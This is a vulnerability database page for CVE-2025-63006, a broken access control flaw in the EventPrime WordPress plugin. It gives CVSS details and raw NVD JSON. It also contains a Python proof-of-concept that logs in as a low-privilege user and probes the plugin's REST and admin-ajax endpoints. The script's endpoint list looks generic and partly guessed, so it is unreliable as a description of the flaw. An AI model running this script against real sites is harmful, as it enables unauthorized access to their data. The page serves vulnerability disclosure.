Security Vulnerability Report
中文
CVE-2025-63006 CVSS 4.3 MEDIUM

CVE-2025-63006

Published: 2025-12-09 16:18:06
Last Modified: 2026-04-27 19:16:17

Description

Missing Authorization vulnerability in Metagauss EventPrime eventprime-event-calendar-management allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects EventPrime: from n/a through <= 4.2.4.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

EventPrime plugin <= 4.2.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-63006 PoC - EventPrime Broken Access Control # Target: WordPress site with EventPrime plugin <= 4.2.4.1 def exploit(target_url, username, password): """ Exploit for CVE-2025-63006: Missing Authorization in EventPrime This PoC demonstrates how a low-privilege user can access admin functions """ session = requests.Session() # Step 1: Login as low-privilege user login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful as low-privilege user") # Step 2: Access protected event data without proper authorization # This endpoint should require admin capabilities but doesn't api_endpoints = [ '/wp-json/eventprime/v1/events', '/wp-json/eventprime/v1/attendees', '/wp-admin/admin-ajax.php?action=ep_get_event_details', '/wp-admin/admin-ajax.php?action=ep_admin_functions' ] for endpoint in api_endpoints: url = target_url + endpoint response = session.get(url) if response.status_code == 200: print(f"[+] Accessible endpoint: {endpoint}") print(f" Response preview: {response.text[:200]}...") else: print(f"[-] Blocked endpoint: {endpoint}") return True if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63006", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:05.637", "lastModified": "2026-04-27T19:16:17.473", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Metagauss EventPrime eventprime-event-calendar-management allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects EventPrime: from n/a through <= 4.2.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/eventprime-event-calendar-management/vulnerability/wordpress-eventprime-plugin-4-2-4-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}